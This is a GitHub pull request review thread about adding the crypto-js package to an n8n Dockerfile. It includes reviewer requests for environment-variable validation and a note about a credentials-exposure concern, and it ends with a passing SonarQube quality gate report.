• GitHub Check: Docker Security Scanning (temporal, Dockerfile.temporal, temporal-test:latest)
• GitHub Check: Service Availability Check

🔇 Additional comments (1)

Dockerfile.n8n (1)

8-8: Crypto-js integration looks solid.

The addition of crypto-js follows the established patterns in the Dockerfile:

• Version argument with caret constraint allows security patches
• Proper npm installation alongside other external packages in a single layer
• NODE_FUNCTION_ALLOW_EXTERNAL correctly updated to enable usage in Code/Function nodes

Also applies to: 18-19, 23-23

[anatolyshipitz]

Add validation for required environment variables in production.

[anatolyshipitz]

• Please review all PR comments.
  Validation for the required environment variables still hasn’t been added (see docker-compose.prod.yml): https://github.com/speedandfunction/automatization/blob/main/docker-compose.prod.yml

[anatolyshipitz]

Security issue regarding credentials exposure has been added and the crypto-js package mentioned in the description is not actually installed

[anatolyshipitz]

reviewed

[anatolyshipitz]

@killev could you please confirm that we’re aligned on this PR?

[anatolyshipitz]

The Requested changes status has been cleared.

[sonarqubecloud]

Quality Gate passed

Issues
0 New issues
0 Accepted issues

Measures
0 Security Hotspots
0.0% Coverage on New Code
0.0% Duplication on New Code

See analysis details on SonarQube Cloud